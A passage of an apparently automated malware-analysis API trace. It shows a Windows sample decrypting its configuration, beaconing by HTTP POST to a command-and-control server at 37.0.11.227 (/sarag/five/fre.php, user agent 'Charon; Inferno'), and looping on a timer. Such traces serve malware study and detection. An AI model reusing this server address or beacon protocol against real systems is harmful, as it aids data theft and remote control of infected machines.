(Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0241.627] GetProcessHeap () returned 0x690000 [0241.627] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0241.627] GetProcessHeap () returned 0x690000 [0241.628] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0241.628] GetProcessHeap () returned 0x690000 [0241.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0241.628] GetProcessHeap () returned 0x690000 [0241.628] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0241.629] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0241.633] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0241.633] GetProcessHeap () returned 0x690000 [0241.633] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0241.633] GetProcessHeap () returned 0x690000 [0241.634] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0241.634] send (s=0x65c, buf=0x6ad508*, len=242, flags=0) returned 242 [0241.635] send (s=0x65c, buf=0x6aba40*, len=159, flags=0) returned 159 [0241.635] GetProcessHeap () returned 0x690000 [0241.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0241.635] recv (in: s=0x65c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0241.810] GetProcessHeap () returned 0x690000 [0241.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0241.811] GetProcessHeap () returned 0x690000 [0241.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0241.812] GetProcessHeap () returned 0x690000 [0241.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0241.812] GetProcessHeap () returned 0x690000 [0241.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0241.813] closesocket (s=0x65c) returned 0 [0241.814] GetProcessHeap () returned 0x690000 [0241.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0241.814] GetProcessHeap () returned 0x690000 [0241.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0241.814] GetProcessHeap () returned 0x690000 [0241.814] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0241.815] GetProcessHeap () returned 0x690000 [0241.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0241.815] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xeb4) returned 0x65c [0241.817] Sleep (dwMilliseconds=0xea60) [0241.819] GetProcessHeap () returned 0x690000 [0241.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0241.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.821] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.832] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0241.845] GetProcessHeap () returned 0x690000 [0241.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0241.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.848] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0241.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.849] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.870] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.870] GetProcessHeap () returned 0x690000 [0241.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0241.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.881] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0241.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.882] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0241.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.883] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0241.883] GetProcessHeap () returned 0x690000 [0241.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0241.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.884] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0241.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.885] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0241.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.886] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0241.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.887] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0241.887] GetProcessHeap () returned 0x690000 [0241.887] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0241.887] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0241.887] GetProcessHeap () returned 0x690000 [0241.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0241.888] GetProcessHeap () returned 0x690000 [0241.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0241.888] GetProcessHeap () returned 0x690000 [0241.888] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0241.888] GetProcessHeap () returned 0x690000 [0241.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0241.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.889] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0241.904] GetProcessHeap () returned 0x690000 [0241.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0241.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.905] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0241.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.906] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.907] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.907] GetProcessHeap () returned 0x690000 [0241.908] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0241.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.909] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0241.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.912] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0241.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.914] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0241.914] GetProcessHeap () returned 0x690000 [0241.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0241.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.915] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0241.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.931] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0241.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.932] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0241.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.933] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0241.933] GetProcessHeap () returned 0x690000 [0241.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0241.934] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0241.934] GetProcessHeap () returned 0x690000 [0241.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0241.934] socket (af=2, type=1, protocol=6) returned 0x660 [0241.936] connect (s=0x660, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0241.961] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0241.961] GetProcessHeap () returned 0x690000 [0241.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0241.961] GetProcessHeap () returned 0x690000 [0241.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0241.961] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0241.962] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0241.962] GetProcessHeap () returned 0x690000 [0241.962] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0241.962] GetProcessHeap () returned 0x690000 [0241.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0241.963] GetProcessHeap () returned 0x690000 [0241.963] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0241.963] GetProcessHeap () returned 0x690000 [0241.963] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0241.964] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0241.965] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0241.965] GetProcessHeap () returned 0x690000 [0241.965] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0241.965] GetProcessHeap () returned 0x690000 [0241.965] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0241.965] send (s=0x660, buf=0x6ad508*, len=242, flags=0) returned 242 [0241.966] send (s=0x660, buf=0x6aba40*, len=159, flags=0) returned 159 [0241.966] GetProcessHeap () returned 0x690000 [0241.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0241.966] recv (in: s=0x660, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0242.036] GetProcessHeap () returned 0x690000 [0242.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0242.036] GetProcessHeap () returned 0x690000 [0242.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0242.037] GetProcessHeap () returned 0x690000 [0242.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0242.037] GetProcessHeap () returned 0x690000 [0242.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0242.038] closesocket (s=0x660) returned 0 [0242.039] GetProcessHeap () returned 0x690000 [0242.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0242.039] GetProcessHeap () returned 0x690000 [0242.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0242.039] GetProcessHeap () returned 0x690000 [0242.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0242.039] GetProcessHeap () returned 0x690000 [0242.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0242.040] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xff0) returned 0x660 [0242.043] Sleep (dwMilliseconds=0xea60) [0242.047] GetProcessHeap () returned 0x690000 [0242.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0242.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.049] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.059] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0242.066] GetProcessHeap () returned 0x690000 [0242.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0242.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.070] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0242.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.071] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.072] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.072] GetProcessHeap () returned 0x690000 [0242.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0242.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.074] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0242.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.074] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0242.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.075] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0242.075] GetProcessHeap () returned 0x690000 [0242.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0242.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.083] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.084] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.084] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.085] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.085] GetProcessHeap () returned 0x690000 [0242.085] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0242.085] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.086] GetProcessHeap () returned 0x690000 [0242.086] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0242.086] GetProcessHeap () returned 0x690000 [0242.087] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0242.087] GetProcessHeap () returned 0x690000 [0242.087] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0242.087] GetProcessHeap () returned 0x690000 [0242.087] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0242.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.088] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.095] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0242.100] GetProcessHeap () returned 0x690000 [0242.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0242.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.100] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0242.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.101] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.102] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.102] GetProcessHeap () returned 0x690000 [0242.103] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0242.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.104] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0242.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.105] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0242.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0242.105] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0242.105] GetProcessHeap () returned 0x690000 [0242.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0242.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.106] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0242.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.107] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0242.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.108] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0242.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0242.109] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0242.109] GetProcessHeap () returned 0x690000 [0242.109] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0242.109] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0242.109] GetProcessHeap () returned 0x690000 [0242.109] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0242.109] socket (af=2, type=1, protocol=6) returned 0x664 [0242.110] connect (s=0x664, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0242.135] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0242.135] GetProcessHeap () returned 0x690000 [0242.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0242.135] GetProcessHeap () returned 0x690000 [0242.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0242.135] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.136] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.136] GetProcessHeap () returned 0x690000 [0242.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0242.136] GetProcessHeap () returned 0x690000 [0242.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0242.137] GetProcessHeap () returned 0x690000 [0242.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0242.137] GetProcessHeap () returned 0x690000 [0242.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0242.138] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0242.138] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.138] GetProcessHeap () returned 0x690000 [0242.138] RtlAllocateHeap (HeapHandle=0x690000, 